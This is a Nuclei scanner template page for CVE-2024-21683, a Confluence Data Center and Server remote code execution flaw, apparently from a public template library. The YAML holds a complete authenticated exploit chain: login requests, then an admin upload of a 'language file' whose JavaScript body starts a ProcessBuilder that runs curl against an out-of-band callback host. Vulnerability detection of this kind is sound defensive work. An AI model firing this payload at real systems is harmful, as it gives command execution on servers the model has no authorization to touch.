Skip to content
Nuclei Templates

Atlassian Confluence Data Center and Server - Remote Code Execution

ID: CVE-2024-21683

Severity: high

Author: pdresearch

Tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive

Description

Section titled “Description”

Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.

YAML Source

Section titled “YAML Source”
id: CVE-2024-21683


info:
  name: Atlassian Confluence Data Center and Server - Remote Code Execution
  author: pdresearch
  severity: high
  description: |
    Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.
  reference:
    - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html
    - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21683
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145
    - https://jira.atlassian.com/browse/CONFSERVER-95832
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 8.3
    cve-id: CVE-2024-21683
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.0866
    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    fofa-query: "app=\"ATLASSIAN-Confluence\""
    product: confluence_data_center
    vendor: atlassian
  tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive
variables:
  username: "{{username}}"
  password: "{{password}}"


http:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        os_username={{username}}&os_password={{password}}&login=Log+in&os_destination=


      - |
        POST /doauthenticate.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Atlassian-Token: no-check


        password={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action


      - |
        POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
        Host: {{Hostname}}
        X-Atlassian-Token: no-check
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE


        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="languageFile";filename="{{randstr}}.js"
        Content-type: text/javascript


        new java.lang.ProcessBuilder["(java.lang.String[])"](["curl","{{interactsh-url}}"]).start()
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE
        Content-Disposition: form-data; name="newLanguageName"


        {{randstr}}
        ------WebKitFormBoundaryFcBwsDjo5LkYWGWE--


    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302 && status_code_2 == 302
          - contains(interactsh_protocol, 'dns')
          - contains(body_3, "confluence")
        condition: and
# digest: 4a0a0047304502202ecb32948d5e98ed89c960623a1963b4de8c5b5947d63e10fbed8c37b1cb5733022100b808dc04b12e4071441588558c6cb6180c001d519014218b5c8d03e0d98182a2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-21683.yaml"

View on Github